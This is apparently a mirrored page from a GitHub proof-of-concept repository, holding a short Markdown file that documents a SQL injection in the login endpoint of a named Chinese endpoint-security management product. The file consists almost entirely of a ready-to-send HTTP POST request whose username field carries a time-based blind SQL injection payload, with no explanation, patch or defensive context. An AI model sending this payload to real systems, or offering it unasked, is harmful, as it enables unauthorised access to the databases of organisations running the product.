mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
7 lines
196 B
Markdown
7 lines
196 B
Markdown
|
|
## 某信景云终端安全管理系统 login SQL注入漏洞
|
||
|
|
```
|
||
|
|
POST /api/user/login
|
||
|
|
|
||
|
|
captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)='
|
||
|
|
```
|